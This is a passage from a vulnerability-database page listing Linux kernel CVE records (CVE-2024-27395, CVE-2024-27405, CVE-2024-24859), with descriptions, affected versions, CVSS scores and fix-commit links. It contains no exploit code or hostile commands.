  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.145Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2db9a8c0a01fa1c762c1e61a13c212c492752994"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/589523cf0b384164e445dd5db8d5b1bf97982424"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35880c3fa6f8fe281a19975d2992644588ca33d3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9048616553c65e750d43846f225843ed745ec0d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eaa5e164a2110d2fb9e16c8a29e4501882235137"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edee0758747d7c219e29db9ed1d4eb33e8d32865"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27395",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:43:26.319846Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:26.879Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/openvswitch/conntrack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2db9a8c0a01fa1c762c1e61a13c212c492752994",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "589523cf0b384164e445dd5db8d5b1bf97982424",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "35880c3fa6f8fe281a19975d2992644588ca33d3",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "9048616553c65e750d43846f225843ed745ec0d4",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "eaa5e164a2110d2fb9e16c8a29e4501882235137",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "edee0758747d7c219e29db9ed1d4eb33e8d32865",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            },
            {
              "lessThan": "5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2",
              "status": "affected",
              "version": "11efd5cb04a184eea4f57b68ea63dddd463158d1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/openvswitch/conntrack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.18"
            },
            {
              "lessThan": "4.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: Fix Use-After-Free in ovs_ct_exit\n\nSince kfree_rcu, which is called in the hlist_for_each_entry_rcu traversal\nof ovs_ct_limit_exit, is not part of the RCU read critical section, it\nis possible that the RCU grace period will pass during the traversal and\nthe key will be free.\n\nTo prevent this, it should be changed to hlist_for_each_entry_safe."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:04:04.943Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2db9a8c0a01fa1c762c1e61a13c212c492752994"
        },
        {
          "url": "https://git.kernel.org/stable/c/589523cf0b384164e445dd5db8d5b1bf97982424"
        },
        {
          "url": "https://git.kernel.org/stable/c/35880c3fa6f8fe281a19975d2992644588ca33d3"
        },
        {
          "url": "https://git.kernel.org/stable/c/9048616553c65e750d43846f225843ed745ec0d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/eaa5e164a2110d2fb9e16c8a29e4501882235137"
        },
        {
          "url": "https://git.kernel.org/stable/c/edee0758747d7c219e29db9ed1d4eb33e8d32865"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2"
        }
      ],
      "title": "net: openvswitch: Fix Use-After-Free in ovs_ct_exit",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27395",
    "datePublished": "2024-05-09T16:37:15.196Z",
    "dateReserved": "2024-02-25T13:47:42.677Z",
    "dateUpdated": "2025-05-04T09:04:04.943Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27405 (GCVE-0-2024-27405)

Vulnerability from cvelistv5 – Published: 2024-05-17 11:40 – Updated: 2025-05-04 09:04

Title

usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs It is observed sometimes when tethering is used over NCM with Windows 11 as host, at some instances, the gadget_giveback has one byte appended at the end of a proper NTB. When the NTB is parsed, unwrap call looks for any leftover bytes in SKB provided by u_ether and if there are any pending bytes, it treats them as a separate NTB and parses it. But in case the second NTB (as per unwrap call) is faulty/corrupt, all the datagrams that were parsed properly in the first NTB and saved in rx_list are dropped. Adding a few custom traces showed the following: [002] d..1 7828.532866: dwc3_gadget_giveback: ep1out: req 000000003868811a length 1025/16384 zsI ==> 0 [002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025 [002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10 [002] d..1 7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 frames In this case, the giveback is of 1025 bytes and block length is 1024. The rest 1 byte (which is 0x00) won't be parsed resulting in drop of all datagrams in rx_list. Same is case with packets of size 2048: [002] d..1 7828.557948: dwc3_gadget_giveback: ep1out: req 0000000011dfd96e length 2049/16384 zsI ==> 0 [002] d..1 7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342 [002] d..1 7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800 Lecroy shows one byte coming in extra confirming that the byte is coming in from PC: Transfer 2959 - Bytes Transferred(1025) Timestamp((18.524 843 590) - Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590) --- Packet 4063861 Data(1024 bytes) Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590) --- Packet 4063863 Data(1 byte) Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722) According to Windows driver, no ZLP is needed if wBlockLength is non-zero, because the non-zero wBlockLength has already told the function side the size of transfer to be expected. However, there are in-market NCM devices that rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize. To deal with such devices, it pads an extra 0 at end so the transfer is no longer multiple of wMaxPacketSize.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/059285e04ebb273d3…
	https://git.kernel.org/stable/c/a31cf46d108dabce3…
	https://git.kernel.org/stable/c/57ca0e16f393bb21d…
	https://git.kernel.org/stable/c/2cb66b62a5d64ccf0…
	https://git.kernel.org/stable/c/35b604a37ec70d68b…
	https://git.kernel.org/stable/c/2b7ec68869d50ea99…
	https://git.kernel.org/stable/c/c7f43900bc723203d…
	https://git.kernel.org/stable/c/76c51146820c5dac6…

Impacted products

Vendor

Product

Version

Linux

Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 059285e04ebb273d32323fbad5431c5b94f77e48 (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < a31cf46d108dabce3df80b3e5c07661e24912151 (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 57ca0e16f393bb21d69734e536e383a3a4c665fd (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 2cb66b62a5d64ccf09b0591ab86fb085fa491fc5 (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 35b604a37ec70d68b19dafd10bbacf1db505c9ca (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 2b7ec68869d50ea998908af43b643bca7e54577e (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < c7f43900bc723203d7554d299a2ce844054fab8e (git)
Affected: 9f6ce4240a2bf456402c15c06768059e5973f28c , < 76c51146820c5dac629f21deafab0a7039bc3ccd (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "9f6ce4240a2b"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "2.6.38"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "0"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "4.19.308"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.4.270"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.10.211"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.15.150"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.1.80"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.6.19"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.7.7"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.8"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-27405",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-28T16:38:04.984999Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-28T16:38:24.854Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.278Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/059285e04ebb273d32323fbad5431c5b94f77e48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a31cf46d108dabce3df80b3e5c07661e24912151"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/57ca0e16f393bb21d69734e536e383a3a4c665fd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2cb66b62a5d64ccf09b0591ab86fb085fa491fc5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35b604a37ec70d68b19dafd10bbacf1db505c9ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b7ec68869d50ea998908af43b643bca7e54577e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c7f43900bc723203d7554d299a2ce844054fab8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/76c51146820c5dac629f21deafab0a7039bc3ccd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_ncm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "059285e04ebb273d32323fbad5431c5b94f77e48",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "a31cf46d108dabce3df80b3e5c07661e24912151",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "57ca0e16f393bb21d69734e536e383a3a4c665fd",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "2cb66b62a5d64ccf09b0591ab86fb085fa491fc5",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "35b604a37ec70d68b19dafd10bbacf1db505c9ca",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "2b7ec68869d50ea998908af43b643bca7e54577e",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "c7f43900bc723203d7554d299a2ce844054fab8e",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            },
            {
              "lessThan": "76c51146820c5dac629f21deafab0a7039bc3ccd",
              "status": "affected",
              "version": "9f6ce4240a2bf456402c15c06768059e5973f28c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_ncm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs\n\nIt is observed sometimes when tethering is used over NCM with Windows 11\nas host, at some instances, the gadget_giveback has one byte appended at\nthe end of a proper NTB. When the NTB is parsed, unwrap call looks for\nany leftover bytes in SKB provided by u_ether and if there are any pending\nbytes, it treats them as a separate NTB and parses it. But in case the\nsecond NTB (as per unwrap call) is faulty/corrupt, all the datagrams that\nwere parsed properly in the first NTB and saved in rx_list are dropped.\n\nAdding a few custom traces showed the following:\n[002] d..1  7828.532866: dwc3_gadget_giveback: ep1out:\nreq 000000003868811a length 1025/16384 zsI ==\u003e 0\n[002] d..1  7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025\n[002] d..1  7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342\n[002] d..1  7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67\n[002] d..1  7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400\n[002] d..1  7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10\n[002] d..1  7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 frames\n\nIn this case, the giveback is of 1025 bytes and block length is 1024.\nThe rest 1 byte (which is 0x00) won\u0027t be parsed resulting in drop of\nall datagrams in rx_list.\n\nSame is case with packets of size 2048:\n[002] d..1  7828.557948: dwc3_gadget_giveback: ep1out:\nreq 0000000011dfd96e length 2049/16384 zsI ==\u003e 0\n[002] d..1  7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342\n[002] d..1  7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800\n\nLecroy shows one byte coming in extra confirming that the byte is coming\nin from PC:\n\n Transfer 2959 - Bytes Transferred(1025)  Timestamp((18.524 843 590)\n - Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590)\n --- Packet 4063861\n       Data(1024 bytes)\n       Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590)\n --- Packet 4063863\n       Data(1 byte)\n       Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722)\n\nAccording to Windows driver, no ZLP is needed if wBlockLength is non-zero,\nbecause the non-zero wBlockLength has already told the function side the\nsize of transfer to be expected. However, there are in-market NCM devices\nthat rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize.\nTo deal with such devices, it pads an extra 0 at end so the transfer is no\nlonger multiple of wMaxPacketSize."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:04:24.877Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/059285e04ebb273d32323fbad5431c5b94f77e48"
        },
        {
          "url": "https://git.kernel.org/stable/c/a31cf46d108dabce3df80b3e5c07661e24912151"
        },
        {
          "url": "https://git.kernel.org/stable/c/57ca0e16f393bb21d69734e536e383a3a4c665fd"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cb66b62a5d64ccf09b0591ab86fb085fa491fc5"
        },
        {
          "url": "https://git.kernel.org/stable/c/35b604a37ec70d68b19dafd10bbacf1db505c9ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b7ec68869d50ea998908af43b643bca7e54577e"
        },
        {
          "url": "https://git.kernel.org/stable/c/c7f43900bc723203d7554d299a2ce844054fab8e"
        },
        {
          "url": "https://git.kernel.org/stable/c/76c51146820c5dac629f21deafab0a7039bc3ccd"
        }
      ],
      "title": "usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27405",
    "datePublished": "2024-05-17T11:40:25.069Z",
    "dateReserved": "2024-02-25T13:47:42.681Z",
    "dateUpdated": "2025-05-04T09:04:24.877Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-24859 (GCVE-0-2024-24859)

Vulnerability from cvelistv5 – Published: 2024-02-05 07:28 – Updated: 2024-08-01 23:28

Title

Race condition vulnerability in Linux kernel bluetooth sniff_{min,max}_interval_set()

Summary

A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service.

Severity ?

4.6 (Medium)


                        
                          CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Assigner

Anolis

